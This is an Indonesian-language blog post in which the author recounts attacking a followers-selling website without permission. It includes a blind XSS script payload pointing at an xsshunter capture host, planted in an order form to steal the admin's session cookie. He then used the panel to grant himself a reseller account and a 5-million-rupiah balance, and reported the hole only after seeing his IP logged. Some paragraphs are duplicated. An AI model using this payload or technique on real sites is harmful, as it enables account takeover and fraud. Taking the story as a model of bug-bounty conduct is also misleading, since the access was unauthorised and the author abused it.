Blind XSS vulnerability
Rafli Hax0r - Halo kembali lagi di rafli hax0r kali ini saya mau cerita cerita pengalaman saya dapat uang jajan dari website jual beli followers . Saya nemuin ini saat saya sedang gabut / bosen dirumah :'v kebetulan ada teman facebook yang menjual akun vip-member.id . Setelah itu terlintas dipikiran saya "Kenapa engga coba pentest aja ? Biasanya Web followers kek gini securitynya engga terlalu dipentingin" karena kebetulan ini web cukup terkenal ( followers murah + cepat, mau beli ? kontak saya hehe :'v ).
Setelah itu saya pun nyari nyari di web tersebut selama sekitar 15 menit engga ketemu temu . nah saya terlintas kenapa engga cari subdomain / domain lain yang satu owner sama ini web ? saya pun mencari cari dan ternyata nemu domain kodokoalamedia.co.id.
Saya pun jalan jalan diwebsite tersebut selama kurang lebih 20 menit. Sampai saya menemukan form Pemesanan, disana terdapat kolom nama, nomor, pesan dan produk yang dipesan. nah disitu terlintas dalam fikiran saya (Negative Think) wah bagaimana kalo masukin payload xss trus masuk sebagai admin lalu memproses pembayaran saya :'v saya pun bergegas membuka xsshunter.com lalu mengambil payload :
Reward Berupa uang :
Itulah pengalaman saya, untungnya saya tidak mengacak ngacak web tersebut dan mendapat hal yang lebih baik karena meninggalkan kejahatan. Btw adminnya dapet heker jahat yang ngebobol tu web, pengen di tindak lanjuti :'v. untung saya engga hehe.
TimeLine :
- Jum'at 11 maret 2019 = Bug Found & First Report
- Sabtu 12 Maret 2019 14:30 = Triaged by their team & Gave me $$$ [1st Reward]
-Rafli Pasya ( ./z3rb0a / lov3code )
Setelah itu saya pun nyari nyari di web tersebut selama sekitar 15 menit engga ketemu temu . nah saya terlintas kenapa engga cari subdomain / domain lain yang satu owner sama ini web ? saya pun mencari cari dan ternyata nemu domain kodokoalamedia.co.id.
Saya pun jalan jalan diwebsite tersebut selama kurang lebih 20 menit. Sampai saya menemukan form Pemesanan, disana terdapat kolom nama, nomor, pesan dan produk yang dipesan. nah disitu terlintas dalam fikiran saya (Negative Think) wah bagaimana kalo masukin payload xss trus masuk sebagai admin lalu memproses pembayaran saya :'v saya pun bergegas membuka xsshunter.com lalu mengambil payload :
"><script src=https://l33t1337(.)xss.ht></script>Dan memasukkannya di kolom nama serta pesan. Karena kebetulan waktu itu malam malam saya berfikir ah mungkin adminnya lagi tidur, tunggu besok saja lah. Esok harinya saya melihat xsshunter lagi dan ternyata benar saja adminnya membuka panel dan xss saya fired. Ketika saya mengambil cookienya sudah expired saya pun mencoba kembali "Pura Pura Pesan" dan pada akhirnya setelah nunggu 30 menit si admin login kembali :'v saya pun dapat cookienya. Seketika saya bisa masuk admin panel.. disana saya menambahkan diri saya sebagai reseller tanpa harus bayar + karena minimum member vip-member.id adalah 1jt saya langsung bisa daftar tanpa uang 1jt, saya pun menambahkan saldo saya menjadi 5jt. disitu saya merasa SENANG sekali guys :'v karena saldo saya 5jt. Saya sudah sempat ingin menjual akun tersebut kemedia sosial, namun....
Setelah ngegabut dipanel admin saya melihat "History Login Admin.txt" didalam panel, karena tidak bisa diedit saya pun panik karena IP saya sudah ada disitu. SAya pun mencari dimedsos seputar pemilik web tersebut, Benar saja ternyata Pemilik web tersebut memiliki 16 teman yang sama seperti saya , Dia juga membuka program bug bounty bagi yang menemukan bug akan di berikan hadiah 1jt. Ketika itu juga saya pun bergegas menkontak adminnya via wa karena difacebook tidak aktif , namun si admin yang megang wa itu bukan developer / ownernya melainkan hanya pekerja saja so saya nunggu aja deh. Eh Ternyata ownernya ngebales pesan saya dia pun Bertanya tanya seputar bug tersebut .seketika dia bilang " Sini ATM kamu, biar semangat saya kasih DP nya dulu" lalu dalam hati saya berkata "Njir ini admin tumben pengertian :'v" yowes saya kirim aja deh rekening ovo ku.
Dia pun mengirim uang sejumlah Rpx.xxx.000 NAMUN itu bukan keseluruhan hadiah karena dia bilang " Ini buat buka puasa ntar, nanti ada lagi buat sahur+buka puasa setelah bug ini saya perbaiki" . Saya nambah semangat nih :'v saya pun berkata dalam hati "Duh ini gede menurutku untuk kategori xss di website lokal, tokopedia, bukalapak dan kawan kawan pun sepertinya lebih kecil dari ini". Ternyata usut punya usul si admin web ngasih 1jt (DP) karena ane berhasil masuk ke admin panel. Nah abis buka puasa si admin selesai memperbaiki saya pun dikirim lagi sebesar Rpx.xxx.000 + Saldo panel 500.000 , saya pun merasa bersukur karena hal itu dan akhirnya duitku kukasih emak buat makan makan bareng keluarga .Reward Berupa uang :
Reward Saldo Panel :
Itulah pengalaman saya, untungnya saya tidak mengacak ngacak web tersebut dan mendapat hal yang lebih baik karena meninggalkan kejahatan. Btw adminnya dapet heker jahat yang ngebobol tu web, pengen di tindak lanjuti :'v. untung saya engga hehe.
TimeLine :
- Jum'at 11 maret 2019 = Bug Found & First Report
- Sabtu 12 Maret 2019 14:30 = Triaged by their team & Gave me $$$ [1st Reward]
- Sabtu 12 mei 2019 21:30 = Bug Fixed & 2nd Reward Given to me
Cepet banget guys :'v
-Rafli Pasya ( ./z3rb0a / lov3code )
![Fix / Patch Bug SQL injection [ Protect Website From Hacker ]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYbyKAmzSEKHktv_wzQx4m7_e0_nSYU853qO7c62v8OfVYUjoTbdhRAFkaBtZjnFw8tB5Yhkn3a2AYyHMvK6ukSyYyFx7lHxCR8O-h3k6tj8Z_pXFcNFmjngMoJsdYlPXzUzbuGqe97opD/s72-c/sqli.jpg "Fix / Patch Bug SQL injection [ Protect Website From Hacker ]")
![[BUGBOUNTY] Able to see everyone original url on ADFLY](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-hSEPdoum7hkh1Db8ffKuMaHzBJ_PKtbZZeiSbuhu7hxhk9nPHLi4eMHZVkkc27EAA1dmfXgvzOPvoQIAbNA4yZlkKtgxzEB4jnTUjIz2n6HSyFgB3ffU4_rqv7es6oRbsd3VuqNI_G6N/s72-c/adfly.jpg "[BUGBOUNTY] Able to see everyone original url on ADFLY")
0 comments